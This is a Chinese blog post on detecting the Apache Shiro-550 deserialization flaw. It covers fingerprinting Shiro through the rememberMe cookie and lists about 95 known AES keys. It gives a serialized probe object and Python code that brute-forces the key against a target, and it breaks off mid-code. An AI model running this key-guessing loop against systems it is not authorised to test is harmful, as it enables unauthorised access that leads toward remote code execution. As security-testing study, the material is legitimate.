<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="0x1 前言在前面原理篇最后提到过Shiro-550反序列化漏洞的一个关键点在于AES加密的密钥。除了密钥之外，Shiro反序列化漏洞的检测还有很多需要关注的点，这篇笔记就Shiro反序列化漏洞的检测展开记录。整体的检测流程如下： 0x2 Shiro的识别检测应用是否存在Shiro反序列化漏洞的第一步就是先检测是否应用是否试用了Shiro。首先最直观的可以先看登录页面是否存在记住我功能，其次可以抓">
<meta property="og:type" content="article">
<meta property="og:title" content="Shiro反序列化漏洞笔记二（检测篇）">
<meta property="og:url" content="http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/index.html">
<meta property="og:site_name" content="长夏">
<meta property="og:description" content="0x1 前言在前面原理篇最后提到过Shiro-550反序列化漏洞的一个关键点在于AES加密的密钥。除了密钥之外，Shiro反序列化漏洞的检测还有很多需要关注的点，这篇笔记就Shiro反序列化漏洞的检测展开记录。整体的检测流程如下： 0x2 Shiro的识别检测应用是否存在Shiro反序列化漏洞的第一步就是先检测是否应用是否试用了Shiro。首先最直观的可以先看登录页面是否存在记住我功能，其次可以抓">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/1.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/2.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/3.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/4.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/5.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/6.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/7.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/8.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/9.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/10.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/11.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/12.png">
<meta property="og:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/13.png">
<meta property="article:published_time" content="2020-09-04T20:27:19.000Z">
<meta property="article:modified_time" content="2022-04-17T14:47:07.411Z">
<meta property="article:author" content="长夏">
<meta property="article:tag" content="JAVA反序列化漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/1.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Shiro反序列化漏洞笔记二（检测篇）</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="长夏" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/10/03/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%B8%89%EF%BC%88%E8%A7%A3%E7%96%91%E7%AF%87%EF%BC%89/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/09/03/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%B8%80%EF%BC%88%E5%8E%9F%E7%90%86%E7%AF%87%EF%BC%89/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&text=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&is_video=false&description=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Shiro反序列化漏洞笔记二（检测篇）&body=Check out this article: http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&name=Shiro反序列化漏洞笔记二（检测篇）&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&t=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-前言"><span class="toc-number">1.</span> <span class="toc-text">0x1 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-Shiro的识别"><span class="toc-number">2.</span> <span class="toc-text">0x2 Shiro的识别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-漏洞检测"><span class="toc-number">3.</span> <span class="toc-text">0x3 漏洞检测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#AES加密的密钥"><span class="toc-number">3.1.</span> <span class="toc-text">AES加密的密钥</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#可用的gadget"><span class="toc-number">3.2.</span> <span class="toc-text">可用的gadget</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-总结"><span class="toc-number">4.</span> <span class="toc-text">0x4 总结</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Shiro反序列化漏洞笔记二（检测篇）
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">长夏</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-09-04T20:27:19.000Z" itemprop="datePublished">2020-09-04</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%8A%80%E6%9C%AF/">技术</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="tag">JAVA反序列化漏洞</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="0x1-前言"><a href="#0x1-前言" class="headerlink" title="0x1 前言"></a>0x1 前言</h2><p>在前面原理篇最后提到过Shiro-550反序列化漏洞的一个关键点在于AES加密的密钥。除了密钥之外，Shiro反序列化漏洞的检测还有很多需要关注的点，这篇笔记就Shiro反序列化漏洞的检测展开记录。整体的检测流程如下：<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/1.png" alt=""></p>
<h2 id="0x2-Shiro的识别"><a href="#0x2-Shiro的识别" class="headerlink" title="0x2 Shiro的识别"></a>0x2 Shiro的识别</h2><p>检测应用是否存在Shiro反序列化漏洞的第一步就是先检测是否应用是否试用了Shiro。首先最直观的可以先看登录页面是否存在记住我功能，其次可以抓取数据包看响应包的头部是否存在Set-Cookie: rememberMe=deleteMe。但是这样子很容易遗漏，最稳妥的方法应该是先在请求的Cookie添加rememberMe=xxx，然后看响应是否返回Set-Cookie: rememberMe=deleteMe。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/2.png" alt=""></p>
<p>如果是平常安全测试的话可以在Burp Suite实现经过代理的每个数据包中自动添加测试Cookie，再观察返回包信息判断是否使用了Shiro框架。也可以通过写Burp Suite插件的方式实现更方便的检测。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/3.png" alt=""></p>
<p>前段时间造轮子写了一个简单的漏洞扫描平台，后来不忍直视基本就弃坑了。就借这个平台重新写一下Shiro反序列化漏洞检测的插件吧。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/4.png" alt=""></p>
<p>按照检测思路，先判断是否试用Shiro，是的话进入检测代码，不是的话直接退出检测。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">response &#x3D; requests.get(target, cookies&#x3D;&#123;&#39;rememberMe&#39;: &#39;check&#39;&#125;)</span><br><span class="line">if &#39;Set-Cookie&#39; in response.headers.keys() and &#39;rememberMe&#x3D;deleteMe&#39; in response.headers[&#39;Set-Cookie&#39;]: #检测是否使用Shiro</span><br><span class="line">	&#x2F;*Shiro反序列化漏洞检测*&#x2F;</span><br><span class="line">else:</span><br><span class="line">	&#x2F;*不存在Shiro反序列化漏洞，退出*&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="0x3-漏洞检测"><a href="#0x3-漏洞检测" class="headerlink" title="0x3 漏洞检测"></a>0x3 漏洞检测</h2><p>进入正式的漏洞检测，对于Shiro反序列化漏洞，最关键的两个因素是：AES加密的密钥以及gadget，即可用的漏洞调用链。但是，为了实现较高的漏洞检出率和较低的误报率，实际的漏洞检测过程中往往需要考虑很多因素，比如是否可达外网等。</p>
<h3 id="AES加密的密钥"><a href="#AES加密的密钥" class="headerlink" title="AES加密的密钥"></a>AES加密的密钥</h3><p>首先来看一下AES加密的密钥，除了AES默认的加密密钥之外，还有一些从互联网上爬取的常用Key。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line">kPH+bIxk5D2deZiIxcaaaA&#x3D;&#x3D;</span><br><span class="line">4AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">2AvVhdsgUs0FSA3SDFAdag&#x3D;&#x3D;</span><br><span class="line">3AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">Z3VucwAAAAAAAAAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">fCq+&#x2F;xW488hMTCD+cmJ3aQ&#x3D;&#x3D;</span><br><span class="line">0AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">1AvVhdsgUs0FSA3SDFAdag&#x3D;&#x3D;</span><br><span class="line">1QWLxg+NYmxraMoxAXu&#x2F;Iw&#x3D;&#x3D;</span><br><span class="line">25BsmdYwjnfcWmnhAciDDg&#x3D;&#x3D;</span><br><span class="line">3JvYhmBLUs0ETA5Kprsdag&#x3D;&#x3D;</span><br><span class="line">r0e3c16IdVkouZgk1TKVMg&#x3D;&#x3D;</span><br><span class="line">5aaC5qKm5oqA5pyvAAAAAA&#x3D;&#x3D;</span><br><span class="line">5AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">6AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">6NfXkC7YVCV5DASIrEm1Rg&#x3D;&#x3D;</span><br><span class="line">6ZmI6I2j5Y+R5aSn5ZOlAA&#x3D;&#x3D;</span><br><span class="line">cmVtZW1iZXJNZQAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">7AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">8AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">8BvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">9AvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">OUHYQzxQ&#x2F;W9e&#x2F;UjiAGu6rg&#x3D;&#x3D;</span><br><span class="line">a3dvbmcAAAAAAAAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">aU1pcmFjbGVpTWlyYWNsZQ&#x3D;&#x3D;</span><br><span class="line">bWljcm9zAAAAAAAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">bWluZS1hc3NldC1rZXk6QQ&#x3D;&#x3D;</span><br><span class="line">bXRvbnMAAAAAAAAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">ZUdsaGJuSmxibVI2ZHc9PQ&#x3D;&#x3D;</span><br><span class="line">wGiHplamyXlVB11UXWol8g&#x3D;&#x3D;</span><br><span class="line">U3ByaW5nQmxhZGUAAAAAAA&#x3D;&#x3D;</span><br><span class="line">MTIzNDU2Nzg5MGFiY2RlZg&#x3D;&#x3D;</span><br><span class="line">L7RioUULEFhRyxM7a2R&#x2F;Yg&#x3D;&#x3D;</span><br><span class="line">a2VlcE9uR29pbmdBbmRGaQ&#x3D;&#x3D;</span><br><span class="line">WcfHGU25gNnTxTlmJMeSpw&#x3D;&#x3D;</span><br><span class="line">OY&#x2F;&#x2F;C4rhfwNxCQAQCrQQ1Q&#x3D;&#x3D;</span><br><span class="line">5J7bIJIV0LQSN3c9LPitBQ&#x3D;&#x3D;</span><br><span class="line">f&#x2F;SY5TIve5WWzT4aQlABJA&#x3D;&#x3D;</span><br><span class="line">bya2HkYo57u6fWh5theAWw&#x3D;&#x3D;</span><br><span class="line">WuB+y2gcHRnY2Lg9+Aqmqg&#x3D;&#x3D;</span><br><span class="line">3qDVdLawoIr1xFd6ietnwg&#x3D;&#x3D;</span><br><span class="line">YI1+nBV&#x2F;&#x2F;m7ELrIyDHm6DQ&#x3D;&#x3D;</span><br><span class="line">6Zm+6I2j5Y+R5aS+5ZOlAA&#x3D;&#x3D;</span><br><span class="line">2A2V+RFLUs+eTA3Kpr+dag&#x3D;&#x3D;</span><br><span class="line">6ZmI6I2j3Y+R1aSn5BOlAA&#x3D;&#x3D;</span><br><span class="line">SkZpbmFsQmxhZGUAAAAAAA&#x3D;&#x3D;</span><br><span class="line">2cVtiE83c4lIrELJwKGJUw&#x3D;&#x3D;</span><br><span class="line">fsHspZw&#x2F;92PrS3XrPW+vxw&#x3D;&#x3D;</span><br><span class="line">XTx6CKLo&#x2F;SdSgub+OPHSrw&#x3D;&#x3D;</span><br><span class="line">sHdIjUN6tzhl8xZMG3ULCQ&#x3D;&#x3D;</span><br><span class="line">O4pdf+7e+mZe8NyxMTPJmQ&#x3D;&#x3D;</span><br><span class="line">HWrBltGvEZc14h9VpMvZWw&#x3D;&#x3D;</span><br><span class="line">rPNqM6uKFCyaL10AK51UkQ&#x3D;&#x3D;</span><br><span class="line">Y1JxNSPXVwMkyvES&#x2F;kJGeQ&#x3D;&#x3D;</span><br><span class="line">lT2UvDUmQwewm6mMoiw4Ig&#x3D;&#x3D;</span><br><span class="line">MPdCMZ9urzEA50JDlDYYDg&#x3D;&#x3D;</span><br><span class="line">xVmmoltfpb8tTceuT5R7Bw&#x3D;&#x3D;</span><br><span class="line">c+3hFGPjbgzGdrC+MHgoRQ&#x3D;&#x3D;</span><br><span class="line">ClLk69oNcA3m+s0jIMIkpg&#x3D;&#x3D;</span><br><span class="line">Bf7MfkNR0axGGptozrebag&#x3D;&#x3D;</span><br><span class="line">1tC&#x2F;xrDYs8ey+sa3emtiYw&#x3D;&#x3D;</span><br><span class="line">ZmFsYWRvLnh5ei5zaGlybw&#x3D;&#x3D;</span><br><span class="line">cGhyYWNrY3RmREUhfiMkZA&#x3D;&#x3D;</span><br><span class="line">IduElDUpDDXE677ZkhhKnQ&#x3D;&#x3D;</span><br><span class="line">yeAAo1E8BOeAYfBlm4NG9Q&#x3D;&#x3D;</span><br><span class="line">cGljYXMAAAAAAAAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">2itfW92XazYRi5ltW0M2yA&#x3D;&#x3D;</span><br><span class="line">XgGkgqGqYrix9lI6vxcrRw&#x3D;&#x3D;</span><br><span class="line">ertVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">5AvVhmFLUS0ATA4Kprsdag&#x3D;&#x3D;</span><br><span class="line">s0KTA3mFLUprK4AvVhsdag&#x3D;&#x3D;</span><br><span class="line">hBlzKg78ajaZuTE0VLzDDg&#x3D;&#x3D;</span><br><span class="line">9FvVhtFLUs0KnA3Kprsdyg&#x3D;&#x3D;</span><br><span class="line">d2ViUmVtZW1iZXJNZUtleQ&#x3D;&#x3D;</span><br><span class="line">yNeUgSzL&#x2F;CfiWw1GALg6Ag&#x3D;&#x3D;</span><br><span class="line">NGk&#x2F;3cQ6F5&#x2F;UNPRh8LpMIg&#x3D;&#x3D;</span><br><span class="line">4BvVhmFLUs0KTA3Kprsdag&#x3D;&#x3D;</span><br><span class="line">MzVeSkYyWTI2OFVLZjRzZg&#x3D;&#x3D;</span><br><span class="line">empodDEyMwAAAAAAAAAAAA&#x3D;&#x3D;</span><br><span class="line">A7UzJgh1+EWj5oBFi+mSgw&#x3D;&#x3D;</span><br><span class="line">c2hpcm9fYmF0aXMzMgAAAA&#x3D;&#x3D;</span><br><span class="line">i45FVt72K2kLgvFrJtoZRw&#x3D;&#x3D;</span><br><span class="line">U3BAbW5nQmxhZGUAAAAAAA&#x3D;&#x3D;</span><br><span class="line">ZnJlc2h6Y24xMjM0NTY3OA&#x3D;&#x3D;</span><br><span class="line">Jt3C93kMR9D5e8QzwfsiMw&#x3D;&#x3D;</span><br><span class="line">MTIzNDU2NzgxMjM0NTY3OA&#x3D;&#x3D;</span><br><span class="line">vXP33AonIp9bFwGl7aT7rA&#x3D;&#x3D;</span><br><span class="line">V2hhdCBUaGUgSGVsbAAAAA&#x3D;&#x3D;</span><br><span class="line">Q01TX0JGTFlLRVlfMjAxOQ&#x3D;&#x3D;</span><br><span class="line">ZAvph3dsQs0FSL3SDFAdag&#x3D;&#x3D;</span><br><span class="line">Is9zJ3pzNh2cgTHB4ua3+Q&#x3D;&#x3D;</span><br><span class="line">NsZXjXVklWPZwOfkvk6kUA&#x3D;&#x3D;</span><br><span class="line">GAevYnznvgNCURavBhCr1w&#x3D;&#x3D;</span><br><span class="line">66v1O8keKNV3TTcGPK1wzg&#x3D;&#x3D;</span><br><span class="line">SDKOLKn2J1j&#x2F;2BHjeZwAoQ&#x3D;&#x3D;</span><br></pre></td></tr></table></figure>

<p>在一开始的Shiro反序列化漏洞检测中，因为AES加密的密钥和gadget都是未知的，在测试过程中就需要对AES的密钥Key和gadget进行遍历尝试，如果存在100个可能的Key，以及8个可能的gadget，那可能需要尝试发送大约800多次请求去检测漏洞，加上不确认目标环境是否可出网，在目标环境不出网的情况下，在进行漏洞探测时应该执行什么命令，以及操作系统不确定等问题使得漏洞检测就更加复杂了。</p>
<p>后面有大佬发现可以通过构造特定的反序列化payload使得在AES的密钥正确的情况下使得相应包头部不返回rememberMe=deleteMe。这就意味着对于每一个密钥，我们只需要构造发送一个数据包即可确认当前密钥是否正确，这样可以大大提高效率和漏洞的检出率。密钥确认的话，基本上就可以确认存在漏洞了，后面无非就是去检测存在哪些gadget的问题。如果密钥跑完都没有结果的话也就无需浪费时间去检测哪个gadget可用了。<br>参考：<br><code>https://sec-in.com/article/468</code></p>
<p><code>http://www.lmxspace.com/2020/08/24/一种另类的shiro检测方式/</code></p>
<p>通过构造一个继承 PrincipalCollection 的序列化空对象，base64编码之后的结果如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">get_key_b64 &#x3D; &quot;rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh&#x2F;WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA&#x3D;&#x3D;&quot;</span><br></pre></td></tr></table></figure>
<p>当AES的密钥正确时不返回rememberMe=deleteMe，这里需要注意的是需要考虑到相应包的头部存在和不存在Set-Cookie两种情况。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">for shiro_key in shiro_keys:</span><br><span class="line">    rememberMe_value &#x3D; shiro_aes(get_key_b64, shiro_key) #检测Shiro AES加密的key</span><br><span class="line">    try:</span><br><span class="line">        response &#x3D; requests.get(target, cookies&#x3D;&#123;&#39;rememberMe&#39;: rememberMe_value&#125;)</span><br><span class="line">        if &#39;Set-Cookie&#39; in response.headers.keys() and &#39;rememberMe&#39; not in response.headers[&#39;Set-Cookie&#39;]:</span><br><span class="line">            shiro_key_right &#x3D; shiro_key</span><br><span class="line">            print &quot;存在Shiro反序列化漏洞&quot;</span><br><span class="line">            print &quot;key found: &quot; + shiro_key</span><br><span class="line">            break</span><br><span class="line">        elif 